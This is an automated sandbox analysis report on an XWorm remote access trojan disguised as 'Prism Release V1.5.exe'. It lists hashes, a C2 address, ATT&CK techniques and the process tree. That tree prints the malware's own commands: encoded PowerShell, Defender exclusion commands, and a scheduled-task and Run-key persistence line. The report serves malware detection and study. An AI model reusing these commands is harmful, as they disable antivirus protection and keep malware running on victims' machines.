xworm | b61ca7c42fef43547c7892c76a925ec4a846373bfcde20426c913a4390f71001

General

Target

Prism Release V1.5.exe
Size

5.1MB
MD5

ac80f970a7ae1c07663abdd11d752d34
SHA1

5ee4c0de86dc91aebb47f3ea6b7e624e861fdfad
SHA256

b61ca7c42fef43547c7892c76a925ec4a846373bfcde20426c913a4390f71001
SHA512

7bd6150976477bec27532e7d7449e8a1ee6997b41359f3b31e2da8db0602f1ac0dfae171d8ebe00a0e18c2c77c7f9e4ed18352f7d8cf76c1cff855166ed6f94b
SSDEEP

98304:crjAG8empOd+SyaREAaOeaD5lWsjvi+ffzwZZHUzItLqbn82rh:3ppcNJQkjvi+ffzwZZJiR1

Score

10^/10

xworm execution persistence rat trojan

Malware Config

Extracted

Family

xworm

C2

91.92.241.69:5555

Attributes

Install_directory
%ProgramData%
install_file
Windows Runtime.exe

Signatures

Detect Xworm Payload 2 IoCs

Processes:

resource	yara_rule
\Users\Admin\dllhost.exe	family_xworm
behavioral1/memory/2720-18-0x00000000011A0000-0x00000000011BA000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

2428 powershell.exe
1768 powershell.exe
1784 powershell.exe
860 powershell.exe
740 powershell.exe
1612 powershell.exe

pid	process
2428	powershell.exe
1768	powershell.exe
1784	powershell.exe
860	powershell.exe
740	powershell.exe
1612	powershell.exe

Drops startup file 2 IoCs

Processes:

dllhost.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Runtime.lnk	dllhost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Runtime.lnk	dllhost.exe

Executes dropped EXE 5 IoCs

Processes:

dllhost.exePrism Executor.exenexusloader.exezohdbc.exesvchost.exe

pid process

2720 dllhost.exe
2636 Prism Executor.exe
332 nexusloader.exe
1576 zohdbc.exe
820 svchost.exe
Loads dropped DLL 7 IoCs

Processes:

Prism Release V1.5.exePrism Executor.exenexusloader.exedllhost.exezohdbc.exesvchost.exe

pid process

2484 Prism Release V1.5.exe
2484 Prism Release V1.5.exe
2636 Prism Executor.exe
332 nexusloader.exe
2720 dllhost.exe
1576 zohdbc.exe
820 svchost.exe

pid	process
2720	dllhost.exe
2636	Prism Executor.exe
332	nexusloader.exe
1576	zohdbc.exe
820	svchost.exe

pid	process
2484	Prism Release V1.5.exe
2484	Prism Release V1.5.exe
2636	Prism Executor.exe
332	nexusloader.exe
2720	dllhost.exe
1576	zohdbc.exe
820	svchost.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

dllhost.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Runtime = "C:\\ProgramData\\Windows Runtime.exe"	dllhost.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

2 ip-api.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

1748 schtasks.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

dllhost.exe

pid process

2720 dllhost.exe
Suspicious behavior: EnumeratesProcesses 7 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedllhost.exe

pid process

2428 powershell.exe
1768 powershell.exe
1784 powershell.exe
860 powershell.exe
740 powershell.exe
1612 powershell.exe
2720 dllhost.exe

flow	ioc
2	ip-api.com

pid	process
1748	schtasks.exe

pid	process
2720	dllhost.exe

pid	process
2428	powershell.exe
1768	powershell.exe
1784	powershell.exe
860	powershell.exe
740	powershell.exe
1612	powershell.exe
2720	dllhost.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

Processes:

powershell.exepowershell.exedllhost.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2428	powershell.exe
Token: SeDebugPrivilege	1768	powershell.exe
Token: SeDebugPrivilege	2720	dllhost.exe
Token: SeDebugPrivilege	1784	powershell.exe
Token: SeDebugPrivilege	860	powershell.exe
Token: SeDebugPrivilege	740	powershell.exe
Token: SeDebugPrivilege	1612	powershell.exe
Token: SeDebugPrivilege	2720	dllhost.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

dllhost.exe

pid process

2720 dllhost.exe

pid	process
2720	dllhost.exe

Suspicious use of WriteProcessMemory 40 IoCs

Processes:

Prism Release V1.5.exePrism Executor.exedllhost.exezohdbc.exe

description	pid	process	target process
PID 2484 wrote to memory of 1768	2484	Prism Release V1.5.exe	powershell.exe
PID 2484 wrote to memory of 1768	2484	Prism Release V1.5.exe	powershell.exe
PID 2484 wrote to memory of 1768	2484	Prism Release V1.5.exe	powershell.exe
PID 2484 wrote to memory of 1768	2484	Prism Release V1.5.exe	powershell.exe
PID 2484 wrote to memory of 2428	2484	Prism Release V1.5.exe	powershell.exe
PID 2484 wrote to memory of 2428	2484	Prism Release V1.5.exe	powershell.exe
PID 2484 wrote to memory of 2428	2484	Prism Release V1.5.exe	powershell.exe
PID 2484 wrote to memory of 2428	2484	Prism Release V1.5.exe	powershell.exe
PID 2484 wrote to memory of 2720	2484	Prism Release V1.5.exe	dllhost.exe
PID 2484 wrote to memory of 2720	2484	Prism Release V1.5.exe	dllhost.exe
PID 2484 wrote to memory of 2720	2484	Prism Release V1.5.exe	dllhost.exe
PID 2484 wrote to memory of 2720	2484	Prism Release V1.5.exe	dllhost.exe
PID 2484 wrote to memory of 2636	2484	Prism Release V1.5.exe	Prism Executor.exe
PID 2484 wrote to memory of 2636	2484	Prism Release V1.5.exe	Prism Executor.exe
PID 2484 wrote to memory of 2636	2484	Prism Release V1.5.exe	Prism Executor.exe
PID 2484 wrote to memory of 2636	2484	Prism Release V1.5.exe	Prism Executor.exe
PID 2636 wrote to memory of 332	2636	Prism Executor.exe	nexusloader.exe
PID 2636 wrote to memory of 332	2636	Prism Executor.exe	nexusloader.exe
PID 2636 wrote to memory of 332	2636	Prism Executor.exe	nexusloader.exe
PID 2720 wrote to memory of 1784	2720	dllhost.exe	powershell.exe
PID 2720 wrote to memory of 1784	2720	dllhost.exe	powershell.exe
PID 2720 wrote to memory of 1784	2720	dllhost.exe	powershell.exe
PID 2720 wrote to memory of 860	2720	dllhost.exe	powershell.exe
PID 2720 wrote to memory of 860	2720	dllhost.exe	powershell.exe
PID 2720 wrote to memory of 860	2720	dllhost.exe	powershell.exe
PID 2720 wrote to memory of 740	2720	dllhost.exe	powershell.exe
PID 2720 wrote to memory of 740	2720	dllhost.exe	powershell.exe
PID 2720 wrote to memory of 740	2720	dllhost.exe	powershell.exe
PID 2720 wrote to memory of 1612	2720	dllhost.exe	powershell.exe
PID 2720 wrote to memory of 1612	2720	dllhost.exe	powershell.exe
PID 2720 wrote to memory of 1612	2720	dllhost.exe	powershell.exe
PID 2720 wrote to memory of 1748	2720	dllhost.exe	schtasks.exe
PID 2720 wrote to memory of 1748	2720	dllhost.exe	schtasks.exe
PID 2720 wrote to memory of 1748	2720	dllhost.exe	schtasks.exe
PID 2720 wrote to memory of 1576	2720	dllhost.exe	zohdbc.exe
PID 2720 wrote to memory of 1576	2720	dllhost.exe	zohdbc.exe
PID 2720 wrote to memory of 1576	2720	dllhost.exe	zohdbc.exe
PID 1576 wrote to memory of 820	1576	zohdbc.exe	svchost.exe
PID 1576 wrote to memory of 820	1576	zohdbc.exe	svchost.exe
PID 1576 wrote to memory of 820	1576	zohdbc.exe	svchost.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe
"C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2484

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAdABtACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHEAegBnACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcALgBnAGcALwBnAGUAdABwAHIAaQBzAG0AIAAtACAAUgB1AG4AIABBAHMAIABBAGQAbQBpAG4AIABJAGYAIABJAG4AagBlAGMAdABpAG8AbgAgAEYAYQBpAGwAcwAnACwAJwAnACwAJwBPAEsAJwAsACcASQBuAGYAbwByAG0AYQB0AGkAbwBuACcAKQA8ACMAdQBzAGQAIwA+AA=="
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1768

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAdAB2ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAcQB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdQBwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAdwBhACMAPgA="
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2428

C:\Users\Admin\dllhost.exe
"C:\Users\Admin\dllhost.exe"
2⤵
- Drops startup file
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2720

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\dllhost.exe'
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1784

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'dllhost.exe'
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:860

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Windows Runtime.exe'
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:740

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Runtime.exe'
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1612

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Runtime" /tr "C:\ProgramData\Windows Runtime.exe"
3⤵
- Creates scheduled task(s)
PID:1748

C:\Users\Admin\AppData\Local\Temp\zohdbc.exe
"C:\Users\Admin\AppData\Local\Temp\zohdbc.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1576

C:\Users\Admin\AppData\Local\Temp\onefile_1576_133629147928502000\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\zohdbc.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:820

C:\Users\Admin\Prism Executor.exe
"C:\Users\Admin\Prism Executor.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2636

C:\Users\Admin\AppData\Local\Temp\onefile_2636_133629147179158000\nexusloader.exe
"C:\Users\Admin\Prism Executor.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:332

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
1⤵
PID:1140

C:\Windows\system32\taskeng.exe
taskeng.exe {564574B8-2846-46D1-A3B6-9AA79E6F5D1E} S-1-5-21-1340930862-1405011213-2821322012-1000:TICCAUTD\Admin:Interactive:[1]
1⤵
PID:1272

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

Scheduled Task/Job

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

Scheduled Task/Job

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

Scheduled Task/Job

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Query Registry

1

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\onefile_2636_133629147179158000\python310.dll
Filesize
4.2MB

MD5
384349987b60775d6fc3a6d202c3e1bd

SHA1
701cb80c55f859ad4a31c53aa744a00d61e467e5

SHA256
f281c2e252ed59dd96726dbb2de529a2b07b818e9cc3799d1ffa9883e3028ed8

SHA512
6bf3ef9f08f4fc07461b6ea8d9822568ad0a0f211e471b990f62c6713adb7b6be28b90f206a4ec0673b92bae99597d1c7785381e486f6091265c7df85ff0f9b5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
7a9d1c19cacd312219e8b3f263b6e98d

SHA1
4b5eec3c52faa2ba8e8ff52444fe8b37675f6750

SHA256
8858d129f3fe4908517468c7f7e0dba6229d3474df036d53da3f1032765660ad

SHA512
b89d523b9ee18c764dd3ca4d4f52897315f46d2384a2548f82352dc1a4c4f2e0eeace7451e337c89a21079ead7144e601d16c7546dddae557c018aa907ff2e06

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
6cc5f2687f2a665534a9c9d2c2c5d571

SHA1
57e8376734a36ec45383c559d8e01a2b5be0bec7

SHA256
b8bea798f9af6c4e33c329cfbba6836289399112c155de53c69448e442430a70

SHA512
ff47f6dba9fe13b36590b0ab0659f13d4f131c9c2060bbc20718ac8323f917a788f5f8eb7e0f23374452f4a1446f82afc5dff2935ef9e88879d08a40e837964f

Download Submit
\Users\Admin\AppData\Local\Temp\onefile_1576_133629147928502000\svchost.exe
Filesize
38.4MB

MD5
473d542fefe26be37736dc09341747bf

SHA1
359cadaafa2f5c032cc300a9097467de701a816c

SHA256
f88890e37c4d16601fad17152fea87947f4098ac3903f138250fa3482bd3bafc

SHA512
01c08a86156b2bc3745c62bea2a787b9635a71a61595b0ddccec976e39fc50ec1547daa15aa301f4109a6bbf99b772f1d427b14a581c5dcfc1a0651e4c79fb16

Download Submit
\Users\Admin\AppData\Local\Temp\onefile_2636_133629147179158000\nexusloader.exe
Filesize
3.5MB

MD5
58545dc488990ac11872079d119f8284

SHA1
dade5c16834d582a5187041697cc5a7c2eae2f88

SHA256
6669bd79928492ab626c6cc64de35e3da76d655bbd197b5cc644584014fea5bc

SHA512
93d6e3f6a2ff03b4b58db7c04f8ad00e5c5f95eceefd199b73a8af6009ef381f758825ebe3d0d3076f917299c850b2859fb2ec35eeef59126617d2a0ec54dcd7

Download Submit
\Users\Admin\AppData\Local\Temp\zohdbc.exe
Filesize
32.9MB

MD5
32004d8a59efe46298e06798a1a96cb9

SHA1
da3c34b6d7d4f692e673e45dacc825b3ef17a2ed

SHA256
03ca5525ec9b76e0d61787679977fff9ed515e7c9d30100ba7d8499a8b62a47f

SHA512
34c25e4b7ec2f61c6df8da73a720a91ec01762b06be8b12308876711e6a3b44f2633b27a38f2c516ff0925cb5829b70e993167e989ceb9a328d7422f7ab41495

Download Submit
\Users\Admin\Prism Executor.exe
Filesize
5.0MB

MD5
fa819e23d8fee4ea89aaaea55e0b28f5

SHA1
18335d4e0d140dcab66c7197c57f669251898ce5

SHA256
bb4fbbf322982321c56ac48cb7939ef7cb823b510a184c41e284f2cdf1bab68c

SHA512
e6170df5c8705e96a76cb3b366c9410c8f8e5c5dd5753de9be87e47a1c989b4723dd655e3355d52096f7acd3185a5469ed5bf284e7765e9519522ae132cef07d

Download Submit
\Users\Admin\dllhost.exe
Filesize
78KB

MD5
4a7f75343aaa5a4d8d18add50ccf3139

SHA1
110c62eee6d7deb4aa9d601c942eae43482d2125

SHA256
34be6a934fd45752e788f9ba20943c8e52d91732d76e9f30a5176e98dccd956e

SHA512
1f1516fc41e0b90d0d47e306da15a542799425159f4ad476cf4fd88b9b56d200c79c72ce29ca5b0acf2a195cabe803c37c72b8d76e99a69a04dbfe1fb9f9fc79

Download Submit
memory/1784-954-0x000000001B730000-0x000000001BA12000-memory.dmp

Filesize
2.9MB

Download
memory/1784-955-0x00000000020C0000-0x00000000020C8000-memory.dmp

Filesize
32KB

Download
memory/2720-18-0x00000000011A0000-0x00000000011BA000-memory.dmp

Filesize
104KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads